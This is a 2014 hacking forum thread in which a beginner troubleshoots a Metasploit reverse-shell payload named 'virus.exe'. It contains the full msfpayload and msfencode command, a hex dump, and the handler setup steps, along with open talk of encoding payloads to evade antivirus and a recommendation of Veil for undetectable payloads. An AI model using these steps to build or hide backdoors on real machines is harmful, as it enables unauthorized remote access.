IAMGiGaByTeX86 Posted June 24, 2014 Share Posted June 24, 2014 Hey guys, So i have a little problem which i do not know how to solve. The problem is that when i encode my payload with x86/shikata_ga_nai and i try it on my windows pc it says it cannot run on the os this is what i typed msfpayload windows/meterpreter/reverse_tcp LHOST=HOSTIP LPORT=PORT R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 X > /root/Desktop/virus.exe did i do something wrong , i tested it on win 8 , win 7 and win xp and it says cannot open on every system :( Does someone know the solution Thank you, Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted June 24, 2014 Share Posted June 24, 2014 Not sure what is wrong with that code. It's been like 4 years since I've played with that kinda of stuff. What does the first 10 bytes of hex look like on your output file? Does it match the signature for an executable header? msfvenom is a framework that combines msfpayload and msfencode. Info: http://www.offensive-security.com/metasploit-unleashed/Msfvenom http://www.offensive-security.com/metasploit-unleashed/Exploit_Development Quote Link to comment Share on other sites More sharing options...
IAMGiGaByTeX86 Posted June 25, 2014 Author Share Posted June 25, 2014 (edited) Thanks for your reply, and yeah i started all the hacking stuff like 3 weeks ago, but i think its alot of fun and i really want to get better at it :D i runned od -t x1 FILENAME on my virus.exe and this was the outcome,i paste my hex in here. 0000000 be 88 90 6f 3c da c3 d9 74 24 f4 5a 29 c9 b1 49 0000020 31 72 14 83 c2 04 03 72 10 6a 65 93 d4 e3 86 6c 0000040 25 93 0f 89 14 81 74 d9 05 15 fe 8f a5 de 52 24 0000060 3d 92 7a 4b f6 18 5d 62 07 ad 61 28 cb ac 1d 33 0000100 18 0e 1f fc 6d 4f 58 e1 9e 1d 31 6d 0c b1 36 33 0000120 8d b0 98 3f ad ca 9d 80 5a 60 9f d0 f3 ff d7 c8 0000140 78 a7 c7 e9 ad b4 34 a3 da 0e ce 32 0b 5f 2f 05 0000160 73 33 0e a9 7e 4a 56 0e 61 39 ac 6c 1c 39 77 0e 0000200 fa cc 6a a8 89 76 4f 48 5d e0 04 46 2a 67 42 4b 0000220 ad a4 f8 77 26 4b 2f fe 7c 6f eb 5a 26 0e aa 06 0000240 89 2f ac ef 76 95 a6 02 62 af e4 4a 47 9d 16 8b 0000260 cf 96 65 b9 50 0c e2 f1 19 8a f5 f6 33 6a 69 09 0000300 bc 8a a3 ce e8 da db e7 90 b1 1b 07 45 15 4c a7 0000320 36 d5 3c 07 e7 bd 56 88 d8 dd 58 42 71 77 a2 05 0000340 21 e7 d3 2b b5 e5 2b c5 1a 60 cd 8f b2 24 45 38 0000360 2a 6d 1d d9 b3 b8 5b d9 38 4e 9b 94 c8 3b 8f 41 0000400 39 76 ed c4 46 ad 98 e8 d2 49 0b be 4a 53 6a 88 0000420 d4 ac 59 82 dd 38 22 fd 21 ac a2 fd 77 ex,a6 a2 95 0000440 2f 92 f0 80 2f 0f 65 19 ba af dc cd 6d c7 e2 28 0000460 59 48 1c 1f 5b b5 cb 66 d9 cf 79 8b 21 0000475 thats my hex , is anything wrong? Edited June 25, 2014 by IAMGiGaByTeX86 Quote Link to comment Share on other sites More sharing options...
i8igmac Posted June 25, 2014 Share Posted June 25, 2014 this maybe dumb question. Did u setup msf multi/handler? Can u try to build a payload with out piping threw the encoder, by default I think shikata is already used by msfpayload. Also post your multi/handler commands try a few payloads. Quote Link to comment Share on other sites More sharing options...
IAMGiGaByTeX86 Posted June 25, 2014 Author Share Posted June 25, 2014 (edited) this maybe dumb question. Did u setup msf multi/handler? Can u try to build a payload with out piping threw the encoder, by default I think shikata is already used by msfpayload. Also post your multi/handler commands try a few payloads. I will post my entire proces making the payload and exploiting it :D 1. Open terminal 2. msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 X > /root/Desktop/virus.exe 3. open 2nd terminal 4. msfconsole 5. use exploit/multi/handler 6. set payload windows/meterpreter/reverse_tcp 7. set LPORT=MYPORT 8. set LHOST=MYLOCALIP 9. exploit So yes i use exploit/multi/handler in preparing the exploit in msfconsole. Also if i create the payload without encoding it with shikataganai it works, but then its getting picked up by virusscanners, so i use the shikata to prevent that, although mubix said shikata is not for avoiding virusscanner and firewalls i dont know any other way to avoid then other then shikata, if you do i would be so thankfull if you post it here :D Edited June 25, 2014 by IAMGiGaByTeX86 Quote Link to comment Share on other sites More sharing options...
Guest spazi Posted June 25, 2014 Share Posted June 25, 2014 you should look into the Veil FrameworkI haven't tried it out myself, but it's supposed to be awesome. The payloads you create through Veil should not be picked up by any AV.Check it out :) Quote Link to comment Share on other sites More sharing options...
IAMGiGaByTeX86 Posted June 25, 2014 Author Share Posted June 25, 2014 you should look into the Veil Framework I haven't tried it out myself, but it's supposed to be awesome. The payloads you create through Veil should not be picked up by any AV. Check it out :) Thanks for the tip! , i will definetly check it out :D Quote Link to comment Share on other sites More sharing options...
i8igmac Posted June 26, 2014 Share Posted June 26, 2014 These public encoders will be undetectable for how long? shikata was 100% undetectable for not long. 98% then 95% 90% 80% 50% as virustital showed after only a few months after its release. Why go public with a fantastic tool like shikata? Or even the tool posted above... Quote Link to comment Share on other sites More sharing options...
factgasm Posted June 26, 2014 Share Posted June 26, 2014 It would be interesting to see the encoders listed by their undetectability. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.